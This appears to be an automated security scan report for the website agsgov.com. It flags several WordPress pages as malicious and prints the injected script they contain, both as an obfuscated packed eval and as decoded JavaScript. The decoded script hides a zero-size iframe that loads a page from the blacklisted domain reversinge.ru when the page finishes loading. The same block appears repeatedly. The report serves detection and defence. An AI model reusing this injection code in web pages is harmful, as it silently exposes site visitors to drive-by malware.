Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=agsgov.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://agsgov.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 14 May 2014 22:27:09 GMT Location: http://www.agsgov.com/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.agsgov.com/xmlrpc.php | clean |
http://www.agsgov.com/ | 200 OK Content-Length: 17114 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: reversinge.ru eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('d j(a){4 b=8.G(\'g\');9(F(b)!=\'E\'&&b!=D){}7{4 c=8.C(\'l\');c.o="g";c.6.n="e";c.6.m="e";c.6.x="e";c.i="0";c.6.p="q ...[464 bytes skipped]... Decoded script: function create_frame(a){var b=document.getElementById('tuyxhdy');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="tuyxhdy";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function kie(){create_frame("http://reversinge.ru/?3")}try{if(window.attachEvent){window.attachEvent('onload',kie)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();kie()};window.onload=newonload}else{window.onload=kie}}}catch(err){} function create_frame(a){var b=document.getElementById('tuyxhdy');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="tuyxhdy";c.style.width="0px";c.style.height="0px";c.s ...[497 bytes skipped]... | ||
http://www.agsgov.com/wp-includes/js/comment-reply.min.js?ver=3.8.3 | 200 OK Content-Length: 757 Content-Type: application/javascript | clean |
http://www.agsgov.com/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 93085 Content-Type: application/javascript | clean |
http://www.agsgov.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://www.agsgov.com/wp-content/themes/u-design/sliders/piecemaker/js/swfobject.js?ver=1.5 | 200 OK Content-Length: 6880 Content-Type: application/javascript | clean |
http://www.agsgov.com/wp-content/themes/u-design/scripts/prettyPhoto/js/jquery.prettyPhoto.js?ver=3.1.3 | 200 OK Content-Length: 24867 Content-Type: application/javascript | clean |
http://www.agsgov.com/wp-content/themes/u-design/scripts/superfish-1.4.8/js/superfish.combined.js?ver=1.0.0 | 200 OK Content-Length: 5387 Content-Type: application/javascript | clean |
http://www.agsgov.com/wp-content/themes/u-design/scripts/script.js?ver=1.0 | 200 OK Content-Length: 7253 Content-Type: application/javascript | clean |
http://www.agsgov.com/wp-content/themes/u-design/scripts/prettyPhoto/custom_params.js?ver=3.1.3 | 200 OK Content-Length: 7904 Content-Type: application/javascript | clean |
http://agsgov.com/what-we-do/business-management/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 14 May 2014 22:27:16 GMT Location: http://www.agsgov.com/what-we-do/business-management/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.agsgov.com/xmlrpc.php | clean |
http://www.agsgov.com/what-we-do/business-management/ | 200 OK Content-Length: 18224 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: reversinge.ru eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('d j(a){4 b=8.G(\'g\');9(F(b)!=\'E\'&&b!=D){}7{4 c=8.C(\'l\');c.o="g";c.6.n="e";c.6.m="e";c.6.x="e";c.i="0";c.6.p="q ...[464 bytes skipped]... Decoded script: function create_frame(a){var b=document.getElementById('tuyxhdy');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="tuyxhdy";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function kie(){create_frame("http://reversinge.ru/?3")}try{if(window.attachEvent){window.attachEvent('onload',kie)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();kie()};window.onload=newonload}else{window.onload=kie}}}catch(err){} function create_frame(a){var b=document.getElementById('tuyxhdy');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="tuyxhdy";c.style.width="0px";c.style.height="0px";c.s ...[497 bytes skipped]... | ||
http://www.agsgov.com/what-we-do/ | 200 OK Content-Length: 19077 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: reversinge.ru eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('d j(a){4 b=8.G(\'g\');9(F(b)!=\'E\'&&b!=D){}7{4 c=8.C(\'l\');c.o="g";c.6.n="e";c.6.m="e";c.6.x="e";c.i="0";c.6.p="q ...[464 bytes skipped]... Decoded script: function create_frame(a){var b=document.getElementById('tuyxhdy');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="tuyxhdy";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function kie(){create_frame("http://reversinge.ru/?3")}try{if(window.attachEvent){window.attachEvent('onload',kie)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();kie()};window.onload=newonload}else{window.onload=kie}}}catch(err){} function create_frame(a){var b=document.getElementById('tuyxhdy');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="tuyxhdy";c.style.width="0px";c.style.height="0px";c.s ...[497 bytes skipped]... | ||
http://www.agsgov.com/what-we-do/business-management/program-evaluation-qa/ | 200 OK Content-Length: 18397 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: reversinge.ru eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('d j(a){4 b=8.G(\'g\');9(F(b)!=\'E\'&&b!=D){}7{4 c=8.C(\'l\');c.o="g";c.6.n="e";c.6.m="e";c.6.x="e";c.i="0";c.6.p="q ...[464 bytes skipped]... Decoded script: function create_frame(a){var b=document.getElementById('tuyxhdy');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="tuyxhdy";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function kie(){create_frame("http://reversinge.ru/?3")}try{if(window.attachEvent){window.attachEvent('onload',kie)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();kie()};window.onload=newonload}else{window.onload=kie}}}catch(err){} function create_frame(a){var b=document.getElementById('tuyxhdy');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="tuyxhdy";c.style.width="0px";c.style.height="0px";c.s ...[497 bytes skipped]... | ||
http://www.agsgov.com/what-we-do/requirements-management/ | 200 OK Content-Length: 17743 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: reversinge.ru eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('d j(a){4 b=8.G(\'g\');9(F(b)!=\'E\'&&b!=D){}7{4 c=8.C(\'l\');c.o="g";c.6.n="e";c.6.m="e";c.6.x="e";c.i="0";c.6.p="q ...[464 bytes skipped]... Decoded script: function create_frame(a){var b=document.getElementById('tuyxhdy');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="tuyxhdy";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function kie(){create_frame("http://reversinge.ru/?3")}try{if(window.attachEvent){window.attachEvent('onload',kie)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();kie()};window.onload=newonload}else{window.onload=kie}}}catch(err){} function create_frame(a){var b=document.getElementById('tuyxhdy');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="tuyxhdy";c.style.width="0px";c.style.height="0px";c.s ...[497 bytes skipped]... | ||
http://www.agsgov.com/what-we-do/requirements-management/requirement-writing-and-linking-2/ | 200 OK Content-Length: 16205 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: reversinge.ru eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('d j(a){4 b=8.G(\'g\');9(F(b)!=\'E\'&&b!=D){}7{4 c=8.C(\'l\');c.o="g";c.6.n="e";c.6.m="e";c.6.x="e";c.i="0";c.6.p="q ...[464 bytes skipped]... Decoded script: function create_frame(a){var b=document.getElementById('tuyxhdy');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="tuyxhdy";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function kie(){create_frame("http://reversinge.ru/?3")}try{if(window.attachEvent){window.attachEvent('onload',kie)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();kie()};window.onload=newonload}else{window.onload=kie}}}catch(err){} function create_frame(a){var b=document.getElementById('tuyxhdy');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="tuyxhdy";c.style.width="0px";c.style.height="0px";c.s ...[497 bytes skipped]... | ||
http://www.agsgov.com/what-we-do/requirements-management/business-and-system-requirements-2/ | 200 OK Content-Length: 15657 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: reversinge.ru eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('d j(a){4 b=8.G(\'g\');9(F(b)!=\'E\'&&b!=D){}7{4 c=8.C(\'l\');c.o="g";c.6.n="e";c.6.m="e";c.6.x="e";c.i="0";c.6.p="q ...[464 bytes skipped]... Decoded script: function create_frame(a){var b=document.getElementById('tuyxhdy');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="tuyxhdy";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function kie(){create_frame("http://reversinge.ru/?3")}try{if(window.attachEvent){window.attachEvent('onload',kie)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();kie()};window.onload=newonload}else{window.onload=kie}}}catch(err){} function create_frame(a){var b=document.getElementById('tuyxhdy');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="tuyxhdy";c.style.width="0px";c.style.height="0px";c.s ...[497 bytes skipped]... |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: agsgov.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 14 May 2014 22:27:09 GMT
Location: http://www.agsgov.com/
Server: Apache
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.agsgov.com/xmlrpc.php
...0 bytes of data.
GET / HTTP/1.1
Host: agsgov.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 14 May 2014 22:27:09 GMT
Location: http://www.agsgov.com/
Server: Apache
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.agsgov.com/xmlrpc.php
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: agsgov.com
Referer: http://www.google.com/search?q=agsgov.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: agsgov.com
Referer: http://www.google.com/search?q=agsgov.com
Result:
The result is similar to the first query. There are no suspicious redirects found.